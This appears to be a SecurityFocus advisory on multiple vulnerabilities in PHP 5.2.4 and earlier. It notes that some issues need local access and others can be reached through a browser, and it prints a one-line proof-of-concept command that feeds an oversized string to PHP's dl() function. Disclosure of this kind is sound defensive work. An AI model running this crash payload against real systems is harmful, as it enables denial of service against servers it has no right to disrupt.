PHP 5.2.4 and Prior Versions Multiple Vulnerabilities

Exploiting some of these issues depends on the configuration of the application employing the vulnerable PHP version. To exploit some of these issues, an attacker must have local access; for other issues, the attacker can use a browser.

The following proofs of concept are available:

php -r'dl(str_repeat("0",27999991));'


Privacy Statement
Copyright 2010, SecurityFocus